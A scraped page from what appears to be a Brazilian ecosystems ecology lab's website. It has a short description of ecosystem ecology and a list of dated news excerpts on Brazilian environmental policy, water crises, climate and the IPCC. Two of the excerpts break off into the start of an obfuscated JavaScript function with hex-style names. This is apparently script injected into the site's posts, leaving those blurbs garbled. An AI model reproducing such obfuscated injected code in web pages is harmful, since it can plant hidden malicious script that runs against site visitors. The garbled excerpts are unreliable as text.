Ecosystems Lab.

How are biological communities organized and functioning? How environmental change affects the communities functioning? These questions are at the heart of advances in the understanding of energy and matter flows on Earth. The Ecosystems Ecology is a branch of Ecology that has as object of study from the microbiota present in a minimal portion of soil to the highest level of terrestrial ecological organization, the biosphere. Understanding how energy flows from the conversion of solar rays by photosynthetic organisms to the dynamics of decomposition of their matter have been key issues for the Ecology of Ecosystems.


Brazil’s lawmakers renew push to weaken environmental rules

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Terrestrial Ecosystems
Aquatic Ecosystems
Global Changes


Brazil’s lawmakers renew push to weaken environmental rules
2 de May de 2018
Nature News highlights the efforts of the conservative coalition that dominates Brazil’s Congress to approve law proposals that roll back environmental regulations. The final push is intende...
Blue Gold
3 de April de 2018
'More valuable than gold'. Why is the world's richest frashwater country experiencing water crises? function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=funct...
Dismantling Brazil’s science threatens global biodiversity heritage – ScienceDirect
3 de April de 2018
Fonte: Dismantling Brazil's science threatens global biodiversity heritage - ScienceDirect function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,...
The burning question
9 de January de 2017
A push to promote wood as a source of renewable, low-carbon energy has set off a debate among scientists about the implications for the climate and forest ecosystems. Much of the discussion ...
Human-Driven Global Warming Is Biggest Threat to Polar Bears, Report Says
9 de January de 2017
Federal wildlife officials on Monday called climate change the biggest threat to the survival of the polar bear and warned that without decisive action to combat global warming, the bear...
Fifth Assessment Report (AR5)
9 de January de 2017
The decision to prepare a Fifth Assessment Report (AR5) was taken by the members of the IPCC at its 28th Session (09-10 April 2008, Budapest, Hungary). Following the election of the new ...

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